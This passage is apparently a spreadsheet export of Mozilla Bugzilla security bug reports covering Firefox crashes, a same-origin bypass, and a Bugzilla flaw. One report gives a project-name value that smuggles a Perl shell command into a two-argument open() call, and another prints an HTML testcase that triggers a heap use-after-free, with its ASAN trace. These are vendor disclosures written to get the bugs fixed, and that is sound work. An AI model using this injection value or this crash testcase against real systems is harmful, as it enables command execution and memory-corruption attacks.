      </c>
      <c r="K2506" t="inlineStr">
        <is>
          <t>78 Branch</t>
        </is>
      </c>
      <c r="L2506" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2506" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N2506" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2506" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main78+][sec-survey]</t>
        </is>
      </c>
      <c r="Q2506" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2506" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2506" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T2506" t="n">
        <v>1</v>
      </c>
      <c r="U2506" t="n">
        <v>0</v>
      </c>
      <c r="V2506" t="n">
        <v>21</v>
      </c>
      <c r="W2506" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-ec8ac249-101c-4324-a463-53a880200520.
```
Top 10 frames of crashing thread:
0 xul.dll rtc::VideoBroadcaster::OnFrame media/webrtc/trunk/webrtc/media/base/videobroadcaster.cc:71
1 xul.dll mozilla::WebrtcVideoConduit::SendVideoFrame media/webrtc/signaling/src/media-conduit/VideoConduit.cpp:1984
2 xul.dll mozilla::MediaPipelineTransmit::VideoFrameFeeder::OnVideoFrameConverted media/webrtc/signaling/src/mediapipeline/MediaPipeline.cpp:801
3 xul.dll mozilla::VideoFrameConverter::VideoFrameConverted dom/media/VideoFrameConverter.h:251
4 xul.dll mozilla::VideoFrameConverter::ProcessVideoFrame dom/media/VideoFrameConverter.h:355
5 xul.dll mozilla::detail::RunnableMethodImpl&lt;RefPtr&lt;mozilla::AudioTrackEncoder&gt;, void  xpcom/threads/nsThreadUtils.h:1237
6 xul.dll mozilla::TaskQueue::Runner::Run xpcom/threads/TaskQueue.cpp:212
7 xul.dll nsThreadPool::Run xpcom/threads/nsThreadPool.cpp:300
8 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1211
9 xul.dll mozilla::ipc::MessagePumpForNonMainThreads::Run ipc/glue/MessagePump.cpp:332
```
¡Hola!
Crashed while on a video call on https://meet.google.com/
Filing as there are more reports over at https://crash-stats.mozilla.org/signature/?product=Firefox&amp;signature=rtc%3A%3AVideoBroadcaster%3A%3AOnFrame
Build Configuration
Source
Built from https://hg.mozilla.org/mozilla-central/rev/8f68705097b4bf88cd61b43b14401cde98ac75b6
Build platform
target
x86_64-pc-mingw32
Build tools
Compiler 	Version 	Compiler flags
/builds/worker/fetches/clang/bin/clang-cl -Xclang -std=gnu99 	10.0.0 	-fcrash-diagnostics-dir=/builds/worker/artifacts -D_HAS_EXCEPTIONS=0 -W3 -Gy -Zc:inline -Gw -Wno-unknown-pragmas -Wno-ignored-pragmas -Wno-deprecated-declarations -Wno-invalid-noreturn
/builds/worker/fetches/clang/bin/clang-cl -Xclang -std=c++17 	10.0.0 	-Qunused-arguments -Qunused-arguments -fcrash-diagnostics-dir=/builds/worker/artifacts -TP -Zc:sizedDealloc- -D_HAS_EXCEPTIONS=0 -W3 -Gy -Zc:inline -Gw -Wno-inline-new-delete -Wno-invalid-offsetof -Wno-microsoft-enum-value -Wno-microsoft-include -Wno-unknown-pragmas -Wno-ignored-pragmas -Wno-deprecated-declarations -Wno-invalid-noreturn -Wno-inconsistent-missing-override -Wno-implicit-exception-spec-mismatch -Wno-microsoft-exception-spec -Wno-unused-local-typedef -Wno-ignored-attributes -Wno-used-but-marked-unused -D_SILENCE_TR1_NAMESPACE_DEPRECATION_WARNING -GR- -Z7 -O2 -Oy-
/builds/worker/fetches/rustc/bin/rustc 	1.43.0 	
Configure options
MOZ_AUTOMATION=1 --target=x86_64-pc-mingw32 MOZILLA_OFFICIAL=1 --enable-update-channel=nightly MOZBUILD_STATE_PATH=/builds/worker/.mozbuild WINE=/builds/worker/fetches/wine/bin/wine64 CC=clang-cl CXX=clang-cl WINDOWSSDKDIR=/builds/worker/checkouts/gecko/vs2017_15.8.4/SDK 'DIA_SDK_PATH=/builds/worker/checkouts/gecko/vs2017_15.8.4/DIA SDK' LINKER=lld-link MAKECAB=/builds/worker/checkouts/gecko/makecab.exe NASM=/builds/worker/fetches/nasm/nasm ENABLE_CLANG_PLUGIN=1 --enable-profile-use=cross --with-pgo-profile-path=/builds/worker/fetches/merged.profdata --with-pgo-jarlog=/builds/worker/fetches/en-US.log MOZ_LTO=cross RUSTC=/builds/worker/fetches/rustc/bin/rustc CARGO=/builds/worker/fetches/rustc/bin/cargo RUSTDOC=/builds/worker/fetches/rustc/bin/rustdoc CBINDGEN=/builds/worker/fetches/cbindgen/cbindgen RUSTFMT=/builds/worker/fetches/rustc/bin/rustfmt --enable-js-shell --enable-rust-simd NODEJS=/builds/worker/fetches/node/bin/node --with-mozilla-api-keyfile=/builds/mozilla-desktop-geoloc-api.key --with-google-location-service-api-keyfile=/builds/gls-gapi.data --with-google-safebrowsing-api-keyfile=/builds/sb-gapi.data DUMP_SYMS=/builds/worker/fetches/dump_syms/dump_syms PDBSTR=/builds/worker/fetches/pdbstr/pdbstr.exe WINCHECKSEC=/builds/worker/fetches/winchecksec/winchecksec MAKE=/usr/bin/make MAKENSISU=/builds/worker/fetches/nsis-3.01/makensis.exe UPX=/builds/worker/fetches/upx-3.95-win64/upx.exe --enable-crashreporter --with-branding=browser/branding/nightly
Please let me know if there's anything else worth collecting form this system.
¡Gracias!
Alex</t>
        </is>
      </c>
      <c r="X2506" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2507">
      <c r="A2507" t="n">
        <v>1079065</v>
      </c>
      <c r="B2507" t="inlineStr">
        <is>
          <t>2014-10-06 21:37:37 -0700</t>
        </is>
      </c>
      <c r="C2507" t="inlineStr">
        <is>
          <t>[SECURITY] Always use the 3 arguments form for open() to prevent shell code injection</t>
        </is>
      </c>
      <c r="D2507" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:40 -0700</t>
        </is>
      </c>
      <c r="E2507" t="n">
        <v>1</v>
      </c>
      <c r="F2507" t="n">
        <v>1</v>
      </c>
      <c r="G2507" t="n">
        <v>4</v>
      </c>
      <c r="H2507" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2507" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2507" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2507" t="inlineStr">
        <is>
          <t>4.4.6</t>
        </is>
      </c>
      <c r="L2507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2507" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2507" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2507" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2507" t="inlineStr">
        <is>
          <t>exploitation requires admin or editcomponents permissions</t>
        </is>
      </c>
      <c r="Q2507" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2507" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2507" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2507" t="n">
        <v>1</v>
      </c>
      <c r="U2507" t="n">
        <v>0</v>
      </c>
      <c r="V2507" t="n">
        <v>50</v>
      </c>
      <c r="W2507" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; rv:11.0) like Gecko
Steps to reproduce:
I noticed this during a cursory look through 4.4.6 to examine the other security issues that were fixed.
The filtering of the product name before the 2 arg open in reports.cgi generate_chart() only sanitizes against path traversal attacks. 2 arg open in perl is generally exploitable for shell code injection if the attacker can control the first or last character of the filename. As far as I can tell, an attacker could leverage this input point IF they have enough permissions to control a project name.
The code that validates project names doesn't appear to prevent using a name like:
xyzzy||perl -e 'use URI::Escape;system(uri_unescape(q{touch%20%2Ftmp%2FI_RAN_SHELLCODE}))'|
I don't have a test server with enough permissions to rename a project or time to set one up before this weekend. I'm expecting that you guys will be able to test the injection readily tough and would prefer to have this reported sooner rather than later.
To verify:
- rename a project to the injection listed above
- run reports.cgi for this project to hit the generate_chart() function
- verify that /tmp/I_RAN_SHELLCODE was created
If you have any trouble verifying this, let me know and I'll check it this weekend.</t>
        </is>
      </c>
      <c r="X2507" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2508">
      <c r="A2508" t="n">
        <v>439035</v>
      </c>
      <c r="B2508" t="inlineStr">
        <is>
          <t>2008-06-13 01:54:27 -0700</t>
        </is>
      </c>
      <c r="C2508" t="inlineStr">
        <is>
          <t>Same-origin check in nsXMLHttpRequest::OnChannelRedirect() can be circumvented</t>
        </is>
      </c>
      <c r="D2508" t="inlineStr">
        <is>
          <t>2008-08-25 02:15:46 -0700</t>
        </is>
      </c>
      <c r="E2508" t="n">
        <v>1</v>
      </c>
      <c r="F2508" t="n">
        <v>1</v>
      </c>
      <c r="G2508" t="n">
        <v>3</v>
      </c>
      <c r="H2508" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2508" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2508" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2508" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2508" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2508" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2508" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2508" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2508" t="inlineStr">
        <is>
          <t>[sg:high xss]</t>
        </is>
      </c>
      <c r="Q2508" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2508" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2508" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2508" t="n">
        <v>1</v>
      </c>
      <c r="U2508" t="n">
        <v>0</v>
      </c>
      <c r="V2508" t="n">
        <v>11</v>
      </c>
      <c r="W2508" t="inlineStr">
        <is>
          <t>This is fx2-only.  (On trunk, the same-origin check in question compares an old
URI to a new URI.)
The same-origin check in nsXMLHttpRequest::OnChannelRedirect() uses a principal
of an associated JS context.  It can be circumvented by loading a cross-origin
page in that context before nsXMLHttpRequest::OnChannelRedirect() is called.
By using this trick, an attacker can read contents and http headers of a target
site.
Upcoming testcase consists of an html and a cgi script, thus it does not work
on bugzilla.mozilla.org.  Please set up it in a suitable place.</t>
        </is>
      </c>
      <c r="X2508" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2509">
      <c r="A2509" t="n">
        <v>1181651</v>
      </c>
      <c r="B2509" t="inlineStr">
        <is>
          <t>2015-07-08 10:20:30 -0700</t>
        </is>
      </c>
      <c r="C2509" t="inlineStr">
        <is>
          <t>crash in CmpInstructions</t>
        </is>
      </c>
      <c r="D2509" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:06 -0700</t>
        </is>
      </c>
      <c r="E2509" t="n">
        <v>1</v>
      </c>
      <c r="F2509" t="n">
        <v>1</v>
      </c>
      <c r="G2509" t="n">
        <v>3</v>
      </c>
      <c r="H2509" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2509" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2509" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2509" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L2509" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2509" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2509" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2509" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2509" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q2509" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2509" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2509" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2509" t="n">
        <v>1</v>
      </c>
      <c r="U2509" t="n">
        <v>0</v>
      </c>
      <c r="V2509" t="n">
        <v>43</v>
      </c>
      <c r="W2509" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-f09852df-ab9d-4f18-bd12-e2f962150705.
=============================================================
Moderately high crash on 40b1. Thanks to COMDAT folding, there is a substitute "cmp" function from IonMonkey, but rest assured this is media code. It looks like an out-of-bounds read on the array, since the addresses are often just over a page boundary.
0a53f394 6b2994f0 xul!CmpInstructions+0xf
0a53f3c0 6b2a14ff xul!stagefright::VectorImpl::sort+0x4d
0a53f44c 6b2a051c xul!stagefright::MPEG4Source::exportIndex+0x1b7
0a53f478 6b29eef4 xul!mp4_demuxer::MP4Metadata::ReadTrackIndex+0x52
0a53f4b0 6bc1d5f1 xul!mp4_demuxer::MP4Demuxer::Init+0xb8
0a53f4ec 6bc1eb72 xul!mozilla::InvokeAndRetry&lt;mozilla::MP4Reader,bool&gt;+0x37
0a53f520 6bb980de xul!mozilla::MP4Reader::ReadMetadata+0x3e
0a53f540 6bba32cd xul!mozilla::MediaDecoderReader::AsyncReadMetadata+0x9e
0a53f554 6bbae33c xul!mozilla::detail::MethodCallWithNoArgs&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;,enum mozilla::ReadMetadataFailureReason,1&gt;,mozilla::MediaDecoderReader&gt;::Invoke+0x11
0a53f564 6bb8c3a7 xul!mozilla::detail::ProxyRunnable&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::MetadataHolder&gt;,enum mozilla::ReadMetadataFailureReason,1&gt; &gt;::Run+0x12
0a53f580 6bbafad5 xul!mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run+0x4f
0a53f5cc 6ad7b899 xul!mozilla::MediaTaskQueue::Runner::Run+0xb7
0a53f5f4 6aabf149 xul!nsThreadPool::Run+0x238</t>
        </is>
      </c>
      <c r="X2509" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2510">
      <c r="A2510" t="n">
        <v>682727</v>
      </c>
      <c r="B2510" t="inlineStr">
        <is>
          <t>2011-08-28 11:09:57 -0700</t>
        </is>
      </c>
      <c r="C2510" t="inlineStr">
        <is>
          <t>Crash during datamove (ACCESS VIOLATION READ) [@ memcpy | nsAString_internal::Assign(unsigned short const*, unsigned int)]</t>
        </is>
      </c>
      <c r="D2510" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:27 -0700</t>
        </is>
      </c>
      <c r="E2510" t="n">
        <v>1</v>
      </c>
      <c r="F2510" t="n">
        <v>1</v>
      </c>
      <c r="G2510" t="n">
        <v>3</v>
      </c>
      <c r="H2510" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2510" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2510" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K2510" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2510" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2510" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2510" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2510" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2510" t="inlineStr">
        <is>
          <t>[sg:critical][oom][qa?]</t>
        </is>
      </c>
      <c r="Q2510" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2510" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2510" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T2510" t="n">
        <v>1</v>
      </c>
      <c r="U2510" t="n">
        <v>0</v>
      </c>
      <c r="V2510" t="n">
        <v>24</v>
      </c>
      <c r="W2510" t="inlineStr">
        <is>
          <t>Created attachment 556407
testcase to crash Firefox 6
When running the attached testcase on a native WinXP SP3 installation (not in VirtualBox)with Firefox 6, it crashes during a datamove at memcpy in method nsAString_internal::Assign(unsigned short const*, unsigned int).
Crash IDs:
bp-61c8c0ae-0b67-4063-bd2b-906392110828
bp-5534e024-7733-42bd-a565-464ce2110828
WinDBG states this as Probably Exploitable. This memcpy crash seems similar to the one in bug 505305 ([sg:critical?]). The testcase is based on the testcase of bug 651990.
Steps to reproduce:
1. Open testcase in Fx6
2. Click the button
Greetings, 
Rh0</t>
        </is>
      </c>
      <c r="X2510" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2511">
      <c r="A2511" t="n">
        <v>1301777</v>
      </c>
      <c r="B2511" t="inlineStr">
        <is>
          <t>2016-09-09 13:32:34 -0700</t>
        </is>
      </c>
      <c r="C2511" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsINode::ReplaceOrInsertBefore</t>
        </is>
      </c>
      <c r="D2511" t="inlineStr">
        <is>
          <t>2024-05-30 09:21:26 -0700</t>
        </is>
      </c>
      <c r="E2511" t="n">
        <v>1</v>
      </c>
      <c r="F2511" t="n">
        <v>1</v>
      </c>
      <c r="G2511" t="n">
        <v>3</v>
      </c>
      <c r="H2511" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2511" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2511" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2511" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2511" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2511" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2511" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2511" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2511" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q2511" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2511" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2511" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T2511" t="n">
        <v>1</v>
      </c>
      <c r="U2511" t="n">
        <v>0</v>
      </c>
      <c r="V2511" t="n">
        <v>14</v>
      </c>
      <c r="W2511" t="inlineStr">
        <is>
          <t>Created attachment 8789918
crash.html (testcase)
The latest ASAN build of Firefox (BuildID=20160908153010) crashes as follows when loading the following testcase:
crash.html:
&lt;script&gt;
function start() {
        s=[];
        o57=document.documentElement;
        document.documentElement.addEventListener('DOMNodeRemoved',f1);
        o582=document.createElement('head');
        o583=document.createElement('style');
        o582.appendChild(o583);
        o583.after("a");
        o583.replaceWith("a",o57,"a");
}
function f1() {
        o582.textContent+="a";
        fuzzPriv.CC();
        location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==16478==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000a1278 at pc 0x7fa0eab7c59e bp 0x7fff668bbb10 sp 0x7fff668bbb08
READ of size 8 at 0x60d0000a1278 thread T0 (Web Content)
    #0 0x7fa0eab7c59d in GetParentNode /home/nils/ffbuild/mozilla-central/dom/base/nsINode.h:929:12
    #1 0x7fa0eab7c59d in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/dom/base/nsINode.cpp:2143
    #2 0x7fa0eab786d8 in InsertBefore /home/nils/ffbuild/mozilla-central/dom/base/nsINode.h:1861:12
    #3 0x7fa0eab786d8 in nsINode::ReplaceWith(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/dom/base/nsINode.cpp:1813
    #4 0x7fa0ec4bfbc2 in mozilla::dom::ElementBinding::replaceWith(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dom/bindings/ElementBinding.cpp:3639:9
    #5 0x7fa0ec895c22 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/nils/ffbuild/mozilla-central/dom/bindings/BindingUtils.cpp:2812:13
    #6 0x7fa0f2d3f2fe in CallJSNative /home/nils/ffbuild/mozilla-central/js/src/jscntxtinlines.h:235:15
    #7 0x7fa0f2d3f2fe in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:454
    #8 0x7fa0f2d24a24 in CallFromStack /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:505:12
    #9 0x7fa0f2d24a24 in Interpret(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:2916
    #10 0x7fa0f2d083d6 in js::RunScript(JSContext*, js::RunState&amp;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:400:12
    #11 0x7fa0f2d3fa7b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:472:15
    #12 0x7fa0f2d404e1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/vm/Interpreter.cpp:518:10
    #13 0x7fa0f283e39d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/nils/ffbuild/mozilla-central/js/src/jsapi.cpp:2835:12
    #14 0x7fa0ec3f93f6 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dom/bindings/EventHandlerBinding.cpp:259:37
    #15 0x7fa0ecce4313 in Call&lt;nsISupports *&gt; /home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #16 0x7fa0ecce4313 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/nils/ffbuild/mozilla-central/dom/events/JSEventHandler.cpp:214
    #17 0x7fa0eccb1d16 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1136:51
    #18 0x7fa0eccb37bf in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/nils/ffbuild/mozilla-central/dom/events/EventListenerManager.cpp:1289:17
    #19 0x7fa0ecc9d663 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:380:16
    #20 0x7fa0ecca10e5 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/nils/ffbuild/mozilla-central/dom/events/EventDispatcher.cpp:711:9
    #21 0x7fa0eeefc928 in nsDocumentViewer::LoadComplete(nsresult) /home/nils/ffbuild/mozilla-central/layout/base/nsDocumentViewer.cpp:998:7
    #22 0x7fa0efd7c3e9 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7606:21
    #23 0x7fa0efd786cf in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7406:7
    #24 0x7fa0efd7f5af in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/nils/ffbuild/mozilla-central/docshell/base/nsDocShell.cpp:7303:13
    #25 0x7fa0e9b211b9 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:1255:3
    #26 0x7fa0e9b1ff6c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:840:14
    #27 0x7fa0e9b1ca6a in nsDocLoader::DocLoaderIsEmpty(bool) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:730:9
    #28 0x7fa0e9b1ed0c in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:612:5
    #29 0x7fa0e9b1fb6c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/uriloader/base/nsDocLoader.cpp:468:14
    #30 0x7fa0e777268c in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/nils/ffbuild/mozilla-central/netwerk/base/nsLoadGroup.cpp:633:28
    #31 0x7fa0eaacc540 in nsDocument::DoUnblockOnload() /home/nils/ffbuild/mozilla-central/dom/base/nsDocument.cpp:8635:18
    #32 0x7fa0eabb7c9f in nsUnblockOnloadEvent::Run() /home/nils/ffbuild/mozilla-central/dom/base/nsDocument.cpp:8588:11
    #33 0x7fa0e758e0cd in nsThread::ProcessNextEvent(bool, bool*) /home/nils/ffbuild/mozilla-central/xpcom/threads/nsThread.cpp:1058:14
    #34 0x7fa0e761480a in NS_ProcessNextEvent(nsIThread*, bool) /home/nils/ffbuild/mozilla-central/xpcom/glue/nsThreadUtils.cpp:290:10
    #35 0x7fa0e8597781 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/nils/ffbuild/mozilla-central/ipc/glue/MessagePump.cpp:96:21
    #36 0x7fa0e848ebcd in RunInternal /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:232:10
    #37 0x7fa0e848ebcd in RunHandler /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:225
    #38 0x7fa0e848ebcd in MessageLoop::Run() /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:205
    #39 0x7fa0ee61464f in nsBaseAppShell::Run() /home/nils/ffbuild/mozilla-central/widget/nsBaseAppShell.cpp:156:27
    #40 0x7fa0f08f6069 in XRE_RunAppShell /home/nils/ffbuild/mozilla-central/toolkit/xre/nsEmbedFunctions.cpp:844:22
    #41 0x7fa0e848ebcd in RunInternal /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:232:10
    #42 0x7fa0e848ebcd in RunHandler /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:225
    #43 0x7fa0e848ebcd in MessageLoop::Run() /home/nils/ffbuild/mozilla-central/ipc/chromium/src/base/message_loop.cc:205
    #44 0x7fa0f08f56f8 in XRE_InitChildProcess /home/nils/ffbuild/mozilla-central/toolkit/xre/nsEmbedFunctions.cpp:674:34
    #45 0x50d26e in content_process_main /home/nils/ffbuild/mozilla-central/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #46 0x50d26e in main /home/nils/ffbuild/mozilla-central/browser/app/nsBrowserApp.cpp:369
    #47 0x7fa102f9282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #48 0x41d8e8 in _start (/home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/bin/firefox+0x41d8e8)
0x60d0000a1278 is located 40 bytes inside of 136-byte region [0x60d0000a1250,0x60d0000a12d8)
freed by thread T0 (Web Content) here:
    #0 0x4d2ea0 in __interceptor_cfree.localalias.1 (/home/nils/ffbuild/mozilla-central/objdir-ff-asan/dist/bin/firefox+0x4d2ea0)
